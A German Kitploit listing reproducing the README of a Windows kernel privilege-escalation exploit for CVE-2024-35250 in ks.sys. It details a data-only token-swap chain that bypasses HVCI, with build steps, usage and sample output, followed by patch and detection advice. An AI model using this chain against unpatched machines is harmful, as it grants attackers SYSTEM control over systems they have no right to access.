Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
HVCIPwned — CVE-2024-35250 zeigt, dass HVCI keine Verteidigung gegen reine Daten-Kernel-Exploits darstellt. Solange ein Treiberfehler ein beliebiges R/W-Primitiv bereitstellt, bleibt Token-Swap eine universelle SYSTEM-Erhöhungstechnik — ohne dass Codeausführung erforderlich ist. | Kitploit
Tools/GitHubGitHub/xvalegendary/hvcipwned
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungBinary-Exploitation
GitHubxvalegendary/hvcipwned

HVCIPwned

CVE-2024-35250 zeigt, dass HVCI keine Verteidigung gegen reine Daten-Kernel-Exploits darstellt. Solange ein Treiberfehler ein beliebiges R/W-Primitiv bereitstellt, bleibt Token-Swap eine universelle SYSTEM-Erhöhungstechnik — ohne dass Codeausführung erforderlich ist.

Repository anzeigen
8vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-35250

Lokale Rechteausweitung durch Dereferenzierung eines nicht vertrauenswürdigen Zeigers im Windows-Kernel-Streaming-Treiber (ks.sys). Reiner Daten-Exploit — umgeht die Hypervisor-geschützte Code-Integrität (HVCI).

Zusammenfassung

FeldDetail
CVECVE-2024-35250
Komponenteks.sys (Kernel-Streaming)
FehlerklasseDereferenzierung eines nicht vertrauenswürdigen Zeigers
AuswirkungEoP auf NT AUTHORITY\SYSTEM
HVCIUmgangen — keine Codeausführung im Kernel
PatchKB5039212 (Juni 2024)
ZielplattformenWindows 10 20H1+ / Windows 11 21H2-23H2

Schwachstelle

ks!KspPropertyHandler leitet Eigenschaftsanfragen auf Topologieebene über KspProcessPropertyNode weiter. Das Feld NodeId der vom Benutzer bereitgestellten KSP_NODE-Struktur wird ohne Grenzprüfung als Index in ein Array der internen Automatisierungstabelle verwendet:

root@kitploit:~
NtDeviceIoControlFile
  ks!CKSFilter::DispatchDeviceIoControl
    ks!KspPropertyHandler
      ks!KspProcessPropertyNode
        *(automationTable + NodeId * stride)   <-- attacker-controlled

Eine manipulierte NodeId, die die tatsächliche Knotenanzahl überschreitet, lenkt die Dereferenzierung auf benachbarten Pool-Speicher um und erzeugt so eine Out-of-Bounds-Lese-/Schreib-Primitive.

HVCI-Umgehung

Der Exploit manipuliert ausschließlich Kernel-Datenstrukturen:

  1. Leakt die EPROCESS-Adresse über NtQuerySystemInformation
  2. Löst die Schwachstelle aus, um beliebigen Kernel-Lese-/Schreibzugriff aufzubauen
  3. Durchläuft ActiveProcessLinks, um PID 4 (System) zu lokalisieren
  4. Überschreibt das Token des aktuellen Prozesses mit dem System-Token
  5. Startet eine Shell mit erweiterten Rechten

Es wird kein Shellcode injiziert. Es werden keine unsignierten Codepages erstellt oder ausgeführt. Es werden keine Control-Flow-Zeiger übernommen.

SchutzStatus
HVCI / KMCIUmgangen
SMEPNicht ausgelöst
SMAPNicht ausgelöst
kCFGNicht ausgelöst

Build

Voraussetzungen

  • Visual Studio 2019 / 2022
  • Windows SDK 10.0.19041.0+

Kompilieren

  1. Öffnen Sie hvcipwned.sln in Visual Studio
  2. Wählen Sie Release | x64
  3. Build → Projektmappe erstellen (Ctrl+Shift+B)

Ausgabedatei: x64\Release\hvcipwned.exe

Manueller Build mit cl.exe

root@kitploit:~
cl.exe /nologo /W4 /O2 /TC ^
    main.c device.c leak.c krw.c token.c exploit.c ^
    /I ^
    /Fe:exploit.exe ^
    /link setupapi.lib kernel32.lib advapi32.lib

Verwendung

root@kitploit:~
hvcipwned.exe

Führen Sie das Programm in einer Benutzersitzung ohne Privilegien auf einem verwundbaren (ungepatchten) System aus. Bei Erfolg öffnet sich ein neues cmd.exe-Fenster, das als NT AUTHORITY\SYSTEM ausgeführt wird.

Erwartete Ausgabe

root@kitploit:~
[+] cve-2024-35250 exploit
[+] ks.sys untrusted pointer dereference -> eop
[~] hvci bypass via data-only attack
[+] os: 10.0.19045
[+] offsets: pid=0x440 links=0x448 token=0x4b8
[+] device: \\?\hdaudio#func_01&ven_10ec...
[+] device handle: 0x00000000000000f4
[~] calibrating r/w primitive...
[+] kernel base: 0xfffff80140000000
[~] spraying named pipes for pool layout...
[+] sprayed 5000 pipe pairs
[~] poking hole at index 2500...
[~] scanning for kernel pointer via oob read...
[+] found kernel ptr at node 3 offset 2: 0xffffa70500000000
[+] pipe object kernel addr: 0xffffa70500000000
[+] r/w primitive initialized (mode 1)
[+] current eprocess: 0xffffa705d90f4080
[+] kernel read pid: 1234 (expected: 1234)
[+] system eprocess: 0xffffa70500004080
[+] system token: 0xffffa70512345673
[+] token after swap: 0xffffa70512345670
[+] token swap successful
[+] escalation complete
[+] elevated shell spawned (pid: 5678)

press enter to exit...

Projektstruktur

root@kitploit:~
hvcipwned/
├── hvcipwned.sln
├── hvcipwned.vcxproj
├── hvcipwned.vcxproj.filters
├── README.md
├── LICENSE
├── .gitignore
├── common.h         - types, log macros, nt api typedefs
├── offsets.h        - per-build eprocess field offsets
├── device.h         - ks device enumeration
├── leak.h           - kernel address leaks
├── krw.h            - r/w primitive context
├── token.h          - token swap + shell spawn
└── exploit.h        - top-level entry
├── main.c           - entry point
├── device.c         - setupapi device open
├── leak.c           - NtQuerySystemInformation leaks
├── krw.c            - vulnerability trigger + pool spray + r/w
├── token.c          - eprocess walk + token overwrite
└── exploit.c        - orchestration

Unterstützte Builds

Offsets werden zur Laufzeit automatisch über RtlGetVersion aufgelöst.

Hinweise

  • Erfordert ein KS-Filtergerät mit Topologieknoten (Audiogeräte funktionieren)
  • Der Erfolg des Pool-Sprays hängt von Systemspeicherdruck und Timing ab
  • Der Exploit nutzt Named-Pipe-Attribute für Pool-Feng-Shui
  • Als regulärer (nicht-Administrator-)Benutzer ausführen, um die Rechteausweitung zu demonstrieren
  • Aufgrund der Randomisierung des Pool-Layouts können mehrere Versuche erforderlich sein

Gegenmaßnahmen

Referenzen

  • Microsoft Advisory
  • KB5039212 Patch Notes
  • DEVCORE — Pwn2Own Vancouver 2024
  • varwara/CVE-2024-35250

Haftungsausschluss

Dieses Projekt dient ausschließlich autorisierten Sicherheitsforschungs- und Bildungszwecken. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche schriftliche Genehmigung. Der Autor übernimmt keinerlei Haftung für Missbrauch oder Schäden, die durch diese Software verursacht werden.

Lizenz

MIT

Tool herunterladen
CET / Shadow StackNicht ausgelöst
BetriebssystemBuildStatus
Windows 10 20H119041Unterstützt
Windows 10 20H219042Unterstützt
Windows 10 21H119043Unterstützt
Windows 10 21H219044Unterstützt
Windows 10 22H219045Unterstützt
Windows 11 21H222000Unterstützt
Windows 11 22H222621Unterstützt
Windows 11 23H222631Unterstützt
MaßnahmeDetail
PatchInstallieren Sie KB5039212 (Juni 2024) oder neuer
ErkennungÜberwachen Sie IOCTL_KS_PROPERTY mit dem Flag KSPROPERTY_TYPE_TOPOLOGY
EDRWarnen Sie bei Token-Integritätsänderungen über EtwTi-Kernel-Callbacks
HärtungBeschränken Sie den Benutzerzugriff auf KS-Geräteschnittstellen über DACL